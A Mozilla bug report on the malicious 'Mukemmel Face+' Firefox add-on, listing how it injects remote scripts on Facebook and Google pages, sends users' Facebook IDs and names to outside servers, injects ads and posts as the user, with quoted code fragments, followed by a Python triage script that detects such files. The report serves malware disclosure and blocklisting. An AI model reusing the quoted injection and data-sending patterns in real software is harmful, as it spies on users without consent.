Bug 748993 - Malicious "Mukemmel Face+" add-on
Product: Toolkit
Classification: Components
Component: Blocklisting
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-04-25 15:07 PDT by MarkH
Modified: 2016-03-07 15:30 PST

Attachments (90.12 KB, application/octet-stream)
2012-04-25 15:07 PDT, MarkH

Description MarkH 2012-04-25 15:07:12 PDT
Created attachment 618446

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.163 Safari/535.19

Steps to reproduce:

Downloaded add-on from

Actual results:

loads "adobeflashplayer.js" from XPI

    code is based on the less malicious "SocialFixer" plugin

    looks to see if it's on a Facebook or Google domain

    uses HTML5 local storage plus cookies to maintain config/state

    injects a <script> tag to load<random_num> when on Facebook
    or,  injects a <script> tag to load<random_num> when on Google

    loads your public details into the DOM via a call to<uid>&callback=cins
    contains the spam URL
    injects either a <script> tag to load<1|2>&amtasak=<uid>&x=<random_number>
    ... or a <script> tag to load<1|2>&amtasak=<uid>&x=<random_number>
    and a <script> tag to load

    empty at the time the analysis was done
offline.js / zaza.js (same file):

    JS to install a font

    not an image file, but javascript
    sends your FB UID to"+FB_UID+"&ck="+userKey+"&me="+FB_UID (since this loads on every Facebook page load, it also sends the current Facebook URL you're viewing as a referrer, allowing them to track you on Facebook)

    has the ability to send your FB UID and name to'+FB_NAME+'&fbid='+FB_UID
    sends your FB UID to'+FB_UID+'
    sends your FB UID to'+a+'/'+FB_UID+'.css
    makes an Ajax request to<random_number>
    injects ads by appending to the FB ad unit via "<iframe id='"+pubid+"_fr' src='"+reklam+"?umtt="+utma+"&umte="+USER_TYPE+"&ub="+SEXE+"' style='border:0px;margin-left:0px' width='230' height='620' scrolling='no' ></iframe>"
    sends your name and FB UID when you submit a bug report via"&name="+FB_NAME+&fbid="+FB_UID
    sends your name and FB UID to"+tableau_aid+"&id_user="+FB_UID+
    posts details of what you do on Facebook via 
    function setPost(aid,what){   
        +"&type="+what,vide, function(){});	
    function unsetPost(aid,what){
        +"&type="+what,vide, function(){});	
    posts status updates to your Timeline / Wall

Expected results:

It shouldn't post your Facebook account information to a 3rd party server or post as you on Facebook without your consent.
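
A triage sketch for the behaviours this report lists (added example, not part of the original report or of Mozilla's blocklist tooling). It checks an XPI for the add-on ID from Comment 1, for image-named files that are not images, and for script-tag injection tied to Facebook or Google hosts; the regex heuristics, the sample XPI, the file name pixel.png and the placeholder URL are assumptions constructed for illustration:

```python
import io, re, zipfile

# Add-on ID given in Comment 1 of this bug.
BLOCKED_IDS = {"{45147e67-4020-47e2-8f7a-55464fb535aa}"}
IMAGE_MAGIC = {".png": b"\x89PNG", ".gif": b"GIF8", ".jpg": b"\xff\xd8\xff"}
# Heuristics (assumptions): dynamic <script> creation and Facebook/Google host checks.
INJECT_RE = re.compile(rb"createElement\(\s*['\"]script['\"]\s*\)")
HOST_RE = re.compile(rb"facebook\.com|google\.", re.I)
ID_RE = re.compile(rb"<em:id>\s*([^<\s]+)\s*</em:id>")

def triage_xpi(data):
    """Return a sorted list of (member, finding) tuples for an XPI given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        for name in xpi.namelist():
            body = xpi.read(name)
            lower = name.lower()
            if lower.endswith("install.rdf"):
                m = ID_RE.search(body)  # assumption: first em:id is the add-on's own
                if m and m.group(1).decode() in BLOCKED_IDS:
                    findings.append((name, "blocked-id"))
            ext = lower[lower.rfind("."):]
            if ext in IMAGE_MAGIC and not body.startswith(IMAGE_MAGIC[ext]):
                findings.append((name, "image-extension-not-image"))
            if INJECT_RE.search(body):
                findings.append((name, "script-injection"))
                if HOST_RE.search(body):
                    findings.append((name, "targets-facebook-or-google"))
    return sorted(findings)

def build_sample_xpi():
    """Constructed sample, not the attachment from this bug."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf",
                   "<RDF><Description><em:id>{45147e67-4020-47e2-8f7a-55464fb535aa}"
                   "</em:id></Description></RDF>")
        z.writestr("content/adobeflashplayer.js",
                   "if (location.host.indexOf('facebook.com') >= 0) {"
                   " var s = document.createElement('script');"
                   " s.src = 'https://placeholder.invalid/x.js';"
                   " document.body.appendChild(s); }")
        z.writestr("content/pixel.png", "var uid = FB_UID;")  # JS behind an image name
        z.writestr("content/icon.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8)
    return buf.getvalue()

if __name__ == "__main__":
    for member, finding in triage_xpi(build_sample_xpi()):
        print(member, finding)
```
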
Comment 1 Jorge Villalobos [:jorgev] 2012-04-25 16:31:30 PDT
ID: {45147e67-4020-47e2-8f7a-55464fb535aa}
Comment 2 Jorge Villalobos [:jorgev] 2012-04-25 16:33:41 PDT